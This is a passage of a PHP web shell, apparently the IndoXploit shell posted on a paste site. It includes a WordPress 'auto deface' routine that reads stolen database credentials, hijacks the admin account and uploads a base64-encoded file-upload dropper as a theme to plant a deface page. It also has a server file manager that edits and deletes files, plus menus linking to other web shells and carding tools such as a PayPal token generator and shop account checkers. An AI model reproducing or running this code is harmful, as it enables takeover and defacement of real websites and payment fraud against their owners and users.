  2107.             $dbpass = ambilWord($config,"DB_PASSWORD', '","'");
  2108.             $dbname = ambilWord($config,"DB_NAME', '","'");
  2109.             $dbprefix = ambilWord($config,"table_prefix  = '","'");
  2110.             $prefix = $dbprefix."users";
  2111.             $option = $dbprefix."options";
  2112.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2113.             $db = mysql_select_db($dbname);
  2114.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2115.             $result = mysql_fetch_array($q);
  2116.             $id = $result[ID];
  2117.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2118.             $result2 = mysql_fetch_array($q2);
  2119.             $target = $result2[option_value];
  2120.             if($target == '') {                
  2121.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2122.             } else {
  2123.                 echo "[+] $target <br>";
  2124.             }
  2125.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2126.             if(!$conn OR !$db OR !$update) {
  2127.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2128.                 mysql_close($conn);
  2129.             } else {
  2130.                 $site = "$target/wp-login.php";
  2131.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  2132.                 $b1 = anucurl($site2);
  2133.                 $wp_sub = ambilWord($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2134.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2135.                 $anu2 = ambilWord($b,"name=\"_wpnonce\" value=\"","\" />");
  2136.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2137.                 $www = "m.php";
  2138.                 $fp5 = fopen($www,"w");
  2139.                 fputs($fp5,$upload3);
  2140.                 $post2 = array(
  2141.                         "_wpnonce" => "$anu2",
  2142.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2143.                         "themezip" => "@$www",
  2144.                         "install-theme-submit" => "Install Now",
  2145.                         );
  2146.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2147.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2148.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2149.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2150.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2151.                       curl_setopt($ch, CURLOPT_POST, 1);
  2152.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2153.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2154.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2155.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2156.                 $data3 = curl_exec($ch);
  2157.                       curl_close($ch);
  2158.                 $y = date("Y");
  2159.                 $m = date("m");
  2160.                 $namafile = "id.php";
  2161.                 $fpi = fopen($namafile,"w");
  2162.                 fputs($fpi,$script);
  2163.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2164.                        curl_setopt($ch6, CURLOPT_POST, true);
  2165.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2166.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2167.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2168.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2169.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  2170.                 $postResult = curl_exec($ch6);
  2171.                        curl_close($ch6);
  2172.                 $as = "$target/k.php";
  2173.                 $bs = anucurl($as);
  2174.                 if(preg_match("#$script#is", $bs)) {
  2175.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2176.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2177.                     } else {
  2178.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  2179.                     echo "[!!] coba aja manual: <br>";
  2180.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2181.                     echo "[+] username: <font color=lime>$user</font><br>";
  2182.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  2183.                     }
  2184.                 mysql_close($conn);
  2185.             }
  2186.         }
  2187.     } else {
  2188.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  2189.         <form method='post'>
  2190.         Link Config: <br>
  2191.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  2192.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By --00--' required><br>
  2193.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2194.         </form></center>";
  2195.     }
  2196. } elseif($_GET['act'] == 'newfile') {
  2197.     if($_POST['new_save_file']) {
  2198.         $newfile = htmlspecialchars($_POST['newfile']);
  2199.         $fopen = fopen($newfile, "a+");
  2200.         if($fopen) {
  2201.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2202.         } else {
  2203.             $act = "<font color=red>permission denied</font>";
  2204.         }
  2205.     }
  2206.     echo $act;
  2207.     echo "<form method='post'>
  2208.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2209.     <input type='submit' name='new_save_file' value='Submit'>
  2210.     </form>";
  2211. } elseif($_GET['act'] == 'newfolder') {
  2212.     if($_POST['new_save_folder']) {
  2213.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2214.         if(!mkdir($new_folder)) {
  2215.             $act = "<font color=red>permission denied</font>";
  2216.         } else {
  2217.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2218.         }
  2219.     }
  2220.     echo $act;
  2221.     echo "<form method='post'>
  2222.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2223.     <input type='submit' name='new_save_folder' value='Submit'>
  2224.     </form>";
  2225. } elseif($_GET['act'] == 'rename_dir') {
  2226.     if($_POST['dir_rename']) {
  2227.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2228.         if($dir_rename) {
  2229.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2230.         } else {
  2231.             $act = "<font color=red>permission denied</font>";
  2232.         }
  2233.     echo "".$act."<br>";
  2234.     }
  2235.     echo "<form method='post'>
  2236.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2237.     <input type='submit' name='dir_rename' value='rename'>
  2238.     </form>";
  2239. } elseif($_GET['act'] == 'delete_dir') {
  2240.     function Delete($path)
  2241. {
  2242.     if (is_dir($path) === true)
  2243.     {
  2244.         $files = array_diff(scandir($path), array('.', '..'));
  2245.         foreach ($files as $file)
  2246.         {
  2247.             Delete(realpath($path) . '/' . $file);
  2248.         }
  2249.         return rmdir($path);
  2250.     }
  2251.     else if (is_file($path) === true)
  2252.     {
  2253.         return unlink($path);
  2254.     }
  2255.     return false;
  2256. }
  2257.     $delete_dir = Delete($dir);
  2258.     if($delete_dir) {
  2259.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2260.     } else {
  2261.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2262.     }
  2263.     echo $act;
  2264. } elseif($_GET['act'] == 'view') {
  2265.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2266.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2267. } elseif($_GET['act'] == 'edit') {
  2268.     if($_POST['save']) {
  2269.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2270.         if($save) {
  2271.             $act = "<font color=lime>Saved!</font>";
  2272.         } else {
  2273.             $act = "<font color=red>permission denied</font>";
  2274.         }
  2275.     echo "".$act."<br>";
  2276.     }
  2277.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2278.     echo "<form method='post'>
  2279.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2280.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  2281.     </form>";
  2282. } elseif($_GET['act'] == 'rename') {
  2283.     if($_POST['do_rename']) {
  2284.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2285.         if($rename) {
  2286.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2287.         } else {
  2288.             $act = "<font color=red>permission denied</font>";
  2289.         }
  2290.     echo "".$act."<br>";
  2291.     }
  2292.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2293.     echo "<form method='post'>
  2294.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2295.     <input type='submit' name='do_rename' value='rename'>
  2296.     </form>";
  2297. } elseif($_GET['act'] == 'delete') {
  2298.     $delete = unlink($_GET['file']);
  2299.     if($delete) {
  2300.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2301.     } else {
  2302.         $act = "<font color=red>permission denied</font>";
  2303.     }
  2304.     echo $act;
  2305. }else {
  2306.     if(is_dir($dir) == true) {
  2307.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2308.         <tr>
  2309.         <th class="th_home"><center>Name</center></th>
  2310.         <th class="th_home"><center>Type</center></th>
  2311.         <th class="th_home"><center>Size</center></th>
  2312.         <th class="th_home"><center>Last Modified</center></th>
  2313.         <th class="th_home"><center>Permission</center></th>
  2314.         <th class="th_home"><center>Action</center></th>
  2315.         </tr>';
  2316.         $scandir = scandir($dir);
  2317.         foreach($scandir as $dirx) {
  2318.             $dtype = filetype("$dir/$dirx");
  2319.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2320.             if(!is_dir("$dir/$dirx")) continue;
  2321.             if($dirx === '..') {
  2322.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2323.             } elseif($dirx === '.') {
  2324.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  2325.             } else {
  2326.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2327.             }
  2328.             if($dirx === '.' || $dirx === '..') {
  2329.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2330.                 } else {
  2331.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2332.             }
  2333.             echo "<tr>";
  2334.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2335.             echo "<td class='td_home'><center>$dtype</center></td>";
  2336.             echo "<td class='td_home'><center>-</center></th>";
  2337.             echo "<td class='td_home'><center>$dtime</center></td>";
  2338.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2339.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2340.         }
  2341.         echo "</tr>";
  2342.         foreach($scandir as $file) {
  2343.             $ftype = filetype("$dir/$file");
  2344.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2345.             $size = filesize("$dir/$file")/1024;
  2346.             $size = round($size,3);
  2347.             if($size > 1024) {
  2348.                 $size = round($size/1024,2). 'MB';
  2349.             } else {
  2350.                 $size = $size. 'KB';
  2351.             }
  2352.             if(!is_file("$dir/$file")) continue;
  2353.             echo "<tr>";
  2354.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2355.             echo "<td class='td_home'><center>$ftype</center></td>";
  2356.             echo "<td class='td_home'><center>$size</center></td>";
  2357.             echo "<td class='td_home'><center>$ftime</center></td>";
  2358.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2359.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2360.         }
  2361.         echo "</tr></table>";
  2362.     } else {
  2363.         echo "<font color=red>can't open directory</font>";
  2364.     }
  2365.     }
  2366. echo "<center><hr><form>
  2367. <select onchange='if (this.value) window.open(this.value);'>
  2368.   <option selected='selected' value=''> Tools Creator </option>
  2369.   <option value='$ling=wso'>WSO 2.8.1</option>
  2370.   <option value='$ling=injection'>1n73ction v3</option>
  2371.   <option value='$ling=wk'>WHMCS Killer</option>
  2372.   <option value='$ling=adminer'>Adminer</option>
  2373.   <option value='$ling=b374k'>b374k Shell</option>
  2374.   <option value='$ling=b374k323'>b374k 3.2</option>  
  2375.   <option value='$ling=bh'>BlackHat Shell</option>      
  2376.   <option value='$ling=dhanus'>Dhanush Shell</option>    
  2377.   <option value='$ling=r57'>R57 Shell</option>    
  2378. <option value='$ling=encodedecode'>Encode Decode</option>    
  2379. <option value='$ling=r57'>R57 Shell</option>    
  2380. </select>
  2381. <select onchange='if (this.value) window.open(this.value);'>
  2382.   <option selected='selected' value=''> Tools Carder </option>
  2383.   <option value='$ling=extractor'>DB Email Extractor</option>
  2384.   <option value='$ling=promailerv2'>Pro Mailer V2</option>    
  2385.   <option value='$ling=bukalapak'>BukaLapak Checker</option>        
  2386.   <option value='$ling=tokopedia'>TokoPedia Checker</option>  
  2387.   <option value='$ling=tokenpp'>Paypal Token Generator</option>  
  2388.   <option value='$ling=mailer'>Mailer</option>  
  2389.   <option value='$ling=gamestopceker'>GamesTop Checker</option>
  2390.   </select>
  2391. <noscript><input type='submit' value='Submit'></noscript>
  2392. </form>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> Shell Recoded By <a href='http://fb.com/--00---410646679131007' target='_BLANK'><font color=lime>--00--</a></font></center>";
  2393. ?>
  2394. </html>
Add Comment
Please, Sign In to add comment